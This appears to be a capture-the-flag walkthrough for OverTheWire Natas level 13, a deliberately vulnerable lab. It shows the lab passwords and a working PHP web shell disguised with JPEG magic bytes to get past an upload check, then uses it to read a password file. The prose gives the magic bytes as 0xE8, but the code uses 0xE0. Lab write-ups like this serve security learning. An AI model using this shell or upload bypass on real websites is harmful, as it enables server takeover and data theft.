Level 13 Username : natas13 Password : jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY URL : http://natas13.natas.labs.overthewire.org
To solve this level, we first log into the natas13 application using the credentials provided above.
The application looks very similar to the previous level, however, the application this time around is checking for the filetype with the exif_imagetype function. According to the PHP manual, the exif_imagetype function determines the type of an image by reading the first bytes of an image and checking its signature.
As the function relies on the first bytes of image and checking its signature, if we can create a file and use the same ‘ magic numbers ‘ that the function is expecting, we should be able to bypass the check. A quick Wikipedia search yields 0xFF 0xD8 0xFF 0xE8 as the magic. Therefore, we create a new php file with the magic numbers in the beginning. I used python to create the following shell file. Apart from the first 4 bytes, the rest of the file is exactly the same as before.
>> shell=open('shell.php','w') >>> shell.write('\xFF\xD8\xFF\xE0' + '<?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?>') >>> shell.close()
Once again, we upload this php file by intercepting the request in Burp and changing the name of the file with a .php extension. Navigate to the URL generated by the application and append ‘ ?cmd=cat%20/etc/natas_webpass/natas14 ‘ and the application prints the password for the next level.
Level 14 Username : natas14 Password : Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 URL : http://natas14.natas.labs.overthewire.org